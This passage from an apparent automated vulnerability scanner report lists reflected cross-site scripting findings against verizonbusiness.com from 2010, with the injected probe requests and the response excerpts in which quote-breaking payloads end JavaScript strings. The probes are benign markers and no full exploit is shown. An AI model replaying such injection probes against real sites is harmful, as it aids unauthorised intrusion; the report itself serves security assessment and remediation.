hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/privated9728";ae12270c155/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.261. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9bcc"%3bd4afdda2138 was submitted in the REST URL parameter 1. This input was echoed as b9bcc";d4afdda2138 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsb9bcc"%3bd4afdda2138/networking/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:42 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsb9bcc";d4afdda2138/networking/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM EL
...[SNIP]...

1.262. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5752'%3b7ca11612774 was submitted in the REST URL parameter 1. This input was echoed as b5752';7ca11612774 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsb5752'%3b7ca11612774/networking/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsb5752';7ca11612774/networking/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.263. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4cea"%3bb0086ace80a was submitted in the REST URL parameter 2. This input was echoed as d4cea";b0086ace80a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingd4cea"%3bb0086ace80a/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42323
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networkingd4cea";b0086ace80a/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.264. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8a6f'%3b8b1660ed888 was submitted in the REST URL parameter 2. This input was echoed as a8a6f';8b1660ed888 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkinga8a6f'%3b8b1660ed888/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42323
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networkinga8a6f';8b1660ed888/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.265. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 119a1"%3bba760f946ef was submitted in the REST URL parameter 3. This input was echoed as 119a1";ba760f946ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/prof-svcs119a1"%3bba760f946ef/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43216
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/prof-svcs119a1";ba760f946ef/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.266. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21357'%3be751f4c7565 was submitted in the REST URL parameter 3. This input was echoed as 21357';e751f4c7565 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/prof-svcs21357'%3be751f4c7565/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43214
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/prof-svcs21357';e751f4c7565/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.267. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dc20"%3bdf5d84120c4 was submitted in the REST URL parameter 1. This input was echoed as 3dc20";df5d84120c4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3dc20"%3bdf5d84120c4/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:22 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products3dc20";df5d84120c4/security/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.268. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8087c'%3b990cb1d007b was submitted in the REST URL parameter 1. This input was echoed as 8087c';990cb1d007b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products8087c'%3b990cb1d007b/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:38 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Date: Wed, 17 Nov 2010 00:40:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products8087c';990cb1d007b/security/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.269. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1d1f"%3b477c6ad0444 was submitted in the REST URL parameter 2. This input was echoed as d1d1f";477c6ad0444 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/securityd1d1f"%3b477c6ad0444/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:47 GMT
Content-Type: text/html
Content-Length: 42301
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/securityd1d1f";477c6ad0444/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.270. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 172b1'%3bf36e47faf72 was submitted in the REST URL parameter 2. This input was echoed as 172b1';f36e47faf72 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security172b1'%3bf36e47faf72/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security172b1';f36e47faf72/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.271. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1685'%3be89d42998b6 was submitted in the REST URL parameter 1. This input was echoed as f1685';e89d42998b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsf1685'%3be89d42998b6/security/compliance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:34 GMT
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsf1685';e89d42998b6/security/compliance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.272. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c36ab"%3bf94a793a7ac was submitted in the REST URL parameter 1. This input was echoed as c36ab";f94a793a7ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsc36ab"%3bf94a793a7ac/security/compliance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsc36ab";f94a793a7ac/security/compliance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.273. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 334c1"%3b90e38324e5c was submitted in the REST URL parameter 2. This input was echoed as 334c1";90e38324e5c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security334c1"%3b90e38324e5c/compliance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

